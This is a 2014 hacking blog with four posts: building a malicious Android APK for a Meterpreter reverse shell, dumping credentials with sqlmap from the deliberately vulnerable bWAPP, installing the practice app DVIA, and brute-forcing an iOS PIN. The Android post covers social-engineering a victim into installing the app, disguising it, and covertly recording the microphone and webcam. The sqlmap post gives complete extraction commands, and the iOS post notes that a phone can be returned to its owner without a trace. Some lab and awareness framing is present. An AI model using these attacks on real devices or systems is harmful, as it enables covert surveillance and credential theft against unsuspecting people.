
Wednesday 30 April 2014

Android Hacking with Armitage

Hi,

In this post I will show you how to get a remote shell on an Android device using Armitage. Armitage is a graphical cyber attack management tool for Metasploit (one of my favorite hacking tools). If you want to learn more about Metasploit and Armitage then I suggest going here and here.

So let's start the demo. I will be using Kali Linux; you can follow the install instructions provided on the link above. The first thing we need to do is create a malicious APK file. APK stands for Android application package file and is quite simply the file format used to install and distribute software on Android devices. We will use this malicious APK to open a remote shell on the target device, allowing the attacker to send commands to it such as turning on the webcam or microphone.

APK File Creation

Once Armitage opens you should see a console screen at the bottom. To create the malicious APK we can use the Metasploit msfpayload command. For the LHOST you enter the IP address of your (attacker) machine; if you don't know your IP, run ifconfig. You will also need an LPORT; for this demo we are using 4444. You should now see the APK on your desktop or whatever location you have chosen.


Identifying The Target

We need to identify our target. This can be done by running a scan of the network or by manually adding the host by selecting Hosts > Add Hosts. For this demo I know my Android smartphone is on 192.168.1.2, so I added it manually.



Sending APK To The Target

This part is up to you. In the real world it will need some social engineering to get the victim to install the app. For this demo I just attached it to an email. Before we install the program we need to set up the listener on the attacker's machine.


Attacker Setup

Now that the victim has successfully installed the app the attacker needs to set up a listener on their machine. We can do this through the console similar to above but Armitage makes it even easier by using the dropdown structure in the top right. Select exploit > multi > handler and double click.


The multi/handler box should appear. You need to make two changes: set the LPORT to 4444 and the payload to android/meterpreter/reverse_tcp. When this is done hit the launch button.



APK Installation

When the program is installing you will see the usual list of permissions. It will list quite a few, as we want full control of the device. From an awareness point of view you should always check the permissions before installing. For example, if I am installing a calculator I need to ask myself why it needs to activate my webcam ;)


Once it has installed you should see an "M" logo on your device with the title MainActivity. You can take this a step further and change the logo picture and title using apktools. When you open the application you will see a button with reverse_tcp displayed on it; again, you can change this to make it more realistic.

When you click on this button it will create a remote session with the attacker's machine. The target machine in Armitage should now turn red with a lightning effect!! At this point we can open a meterpreter prompt by right clicking on the host then selecting Meterpreter X > Interact > Meterpreter Shell.




Another tab should open below with Meterpreter X as its title. We can now interact with the host. If you type "help" you will get a list of available commands. You can list the processes running or move about the various directories. At the bottom you should see record_mic and webcam options.


You can take a webcam_snap or stream. There is also capability to switch between front and back camera.





You can also turn the microphone on for X seconds. The file will be saved in the /usr/share/armitage folder as sound.wav:

record_mic -d 10 -f sound.wav -p false

So that's it: by getting a user to install a malicious application an attacker can completely control the device. Happy Hacking :)


Monday 21 April 2014

Exploiting SQL Injection with SQLmap

Hi, one tool I really like to use for exploiting SQLi is SQLmap. It is available here @ http://sqlmap.org/ and is also part of many distros such as Kali Linux and SamuraiWTF. It is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers.

To demonstrate this powerful tool we will use bWAPP, the deliberately insecure web application. You can find more information here http://www.mmeit.be/bwapp/. bWAPP has over 70 vulnerabilities that you can use to sharpen your skills without fear of going to jail :)

Before we begin the demo we must first try to understand what SQL Injection is. This type of attack occurs when an application takes untrusted data and sends it to an interpreter, in this case the database, as part of a query. The attacker's hostile data may then trick the interpreter into executing unintended commands. If untrusted data is used to construct SQL calls then the attacker will be able to modify the query to return data.

In order to protect against this attack developers must validate and escape the hostile data before it reaches the interpreter. This can be done using prepared statements or parameterized queries. I will go into SQLi in more detail in a later post.
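As an added illustration of the point above (example code, not from the post or from bWAPP), here is the same movie search written two ways in Python with an in-memory SQLite table standing in for bWAPP's database: the concatenated query lets the single-quote probe break the statement, while the parameterized query treats the quote as data. The table name, rows and search functions are constructed for this example.

```python
import sqlite3


def make_db():
    # Constructed sample data standing in for bWAPP's movie table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE movies (title TEXT, year INTEGER)")
    conn.executemany(
        "INSERT INTO movies VALUES (?, ?)",
        [("Iron Man", 2008), ("The Matrix", 1999), ("Ocean's Eleven", 2001)],
    )
    return conn


def search_vulnerable(conn, title):
    # Untrusted input is concatenated straight into the SQL text, so a quote
    # in `title` changes the structure of the statement instead of staying a
    # literal value. This is the pattern the single-quote probe detects.
    sql = "SELECT title, year FROM movies WHERE title = '" + title + "'"
    return conn.execute(sql).fetchall()


def search_parameterized(conn, title):
    # The SQL text is fixed; the driver binds `title` as a value, so any
    # quotes are just characters in the search term.
    sql = "SELECT title, year FROM movies WHERE title = ?"
    return conn.execute(sql, (title,)).fetchall()


def probe(search):
    """Submit the tester's probe (a lone single quote) to a search function.

    Returns the result rows, or an 'SQL error: ...' string when the database
    rejects the statement, which is what signals an injectable parameter.
    """
    conn = make_db()
    try:
        return search(conn, "'")
    except sqlite3.Error as exc:
        return "SQL error: " + str(exc)


if __name__ == "__main__":
    print("vulnerable    :", probe(search_vulnerable))
    print("parameterized :", probe(search_parameterized))
    # A legitimate title containing an apostrophe only works when bound.
    print(search_parameterized(make_db(), "Ocean's Eleven"))
```

The vulnerable version also fails on a perfectly legitimate title such as "Ocean's Eleven", so parameterizing fixes a correctness bug as well as the injection.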

So we have our vulnerable bWAPP page below. We know it is vulnerable because we have injected a single quote into the input field and it has returned a SQL error. From this we can deduce that our input is reaching the database without proper validation.





If you look at the request below you will see that title is the vulnerable parameter, so this is the one we must concentrate our attack on.

http://itsecgames.com/bWAPP/sqli_1.php?title='&action=search


The next thing to do is fire up SQLmap. For this demo I am using Kali Linux but you can run it in Windows or another distro. In Kali you can open up a terminal and simply type sqlmap. There are a lot of useful options in sqlmap you can check them out here https://github.com/sqlmapproject/sqlmap/wiki/Usage

We can now try to return some information. The command below will return all of the available databases. The -u switch takes the URL (note the vulnerable title parameter), --cookie supplies the session cookie, and --dbs enumerates the databases. I used the Firefox addon Cookie Manager to retrieve the cookie information, but you can also run ZAProxy or Burp Suite to capture it.

sqlmap -u "http://itsecgames.com/bWAPP/sqli_1.php?title=" --cookie="PHPSESSID=780b97cfb3fee59b69f7d4e0345428cd;security_level=0" --dbs


We can see above that it has returned 3 databases. We can also return the current database users by using the command below:

sqlmap -u "http://itsecgames.com/bWAPP/sqli_1.php?title=" --cookie="PHPSESSID=780b97cfb3fee59b69f7d4e0345428cd;security_level=0" --users

OK, let's return the tables in the bWAPP database. The -D switch selects the database and --tables lists its tables.

sqlmap -u "http://itsecgames.com/bWAPP/sqli_1.php?title=" --cookie="PHPSESSID=780b97cfb3fee59b69f7d4e0345428cd;security_level=0" -D bWAPP --tables

We can see that there are 4 tables returned; the users table looks interesting, so let's go a step further and return the columns from the users table.

sqlmap -u "http://itsecgames.com/bWAPP/sqli_1.php?title=" --cookie="PHPSESSID=780b97cfb3fee59b69f7d4e0345428cd;security_level=0" -D bWAPP -T users --columns

The last step for us is to dump out the data from the columns. You can select the interesting ones or dump all.

sqlmap -u "http://itsecgames.com/bWAPP/sqli_1.php?title=" --cookie="PHPSESSID=780b97cfb3fee59b69f7d4e0345428cd;security_level=0" -D bWAPP -T users -C login,email,password,secret --dump

We can also work on cracking the password hashes offline. So there you have it, a really useful tool for speeding up the exploitation of SQL Injection vulnerabilities.

Friday 18 April 2014

Test your iOS skills with DVIA

Hey,

If you are interested in testing your iOS penetration testing skills in a legal environment then the Damn Vulnerable iOS Application (DVIA) is for you, available here @ http://damnvulnerableiosapp.com/. The application covers the most common security vulnerabilities found in iOS applications, aligning with the OWASP Mobile Top 10.

Vulnerabilities and Challenges
  • Insecure Data Storage
  • Jailbreak Detection
  • Runtime Manipulation
  • Piracy Detection
  • Transport Layer Security
  • Client Side Injection
  • Information Disclosure
  • Broken Cryptography
  • Security Decisions via Untrusted input
  • Side channel data leakage
  • Application Patching


One of the ways to install the IPA is to use the IPA Installer Console.

First, download the IPA from the site linked above.

Then copy the file over to your iOS device using sftp:

sftp root@X.X.X.X

put DamnVulnerableIOSApp.ipa

Now run the command "ipainstaller DamnVulnerableIOSApp.ipa" or "installipa DamnVulnerableIOSApp.ipa" to install the application.

You should now see the application on the device.

Happy Hacking :)

iOS Pin Guessing Attack

In this post I would like to talk about the threat posed by lost or stolen mobile devices. It is inevitable that devices will be misplaced; it's human nature, right? Mobile devices are also a common target for theft. Device passcodes are seen as the first line of defense to prevent unauthorized access and subsequent data compromise.

The length and complexity of the passcode will largely determine how successful this measure will be against the malicious user. When deciding on a passcode complexity policy we also have to take the user into consideration, since they will have to enter it each time they want to access the device.

In order to demonstrate the pitfalls of weak passcodes we will use the iPhone Data Protection Tools project http://code.google.com/p/iphone-dataprotection/. With these tools we can mount a PIN guessing attack against the device. The initial setup is quite complex and requires multiple steps, but once this is done the actual attack is quite easy. You will need an iOS device susceptible to jailbreaking, e.g. 5.1.1, and a Mac.

Fortunately there is an easy to follow document provided by Joshua Wright, available here http://www.willhackforsushi.com/ios-key-recovery.pdf. Once you have the installation and preparation done we can walk through the exploit.

The first step is to plug the device into the Mac via USB and let iTunes start. Next, power off the device, ensuring that it is completely turned off.

Start redsn0w to jailbreak the device using the patched iOS firmware file, custom kernel and ramdisk you created during the preparation.



When redsn0w starts you will see the window below:



Click next and follow the steps on the menu:
  • Press and hold the suspend button for 3 seconds
  • Without releasing the suspend button, press the home button for 10 seconds
  • Release the suspend button but keep holding the home button for another 15 seconds


After a minute or two you should see OK on the device. This signals a successful exploit.

Now start an SSH listener on the device using the command below. The tcprelay.sh script is part of the iPhone Data Protection Tools.



At this point you can SSH into the iOS device using the following command (Note: the default password will be alpine).




The final step is to launch the bruteforce attack. The script will iterate through all the possible combinations, i.e. 0000 - 9999, until it hits the correct number. The attack will not trigger a lockout as it bypasses the UI, calling the low-level MKBUnlockDevice() kernel function directly. As you can see below, the passcode has been returned as 0022.




Using this technique an attacker could recover a 4-digit PIN in 13 minutes on average; increasing the length to 6 digits dramatically increases the recovery time to 22 hours. If the user has a strong alphanumeric passcode then it cannot be brute forced in a reasonable amount of time, which gives the user the ability to initiate a device wipe.

Once the PIN has been recovered it is then possible to decrypt the keybag and recover wireless keys etc. It will also be possible to take an iTunes backup containing the victim's email, SMS and photos. The device can then be rebooted, leaving no trace of the attack, and returned to the victim if desired. Pretty scary stuff!!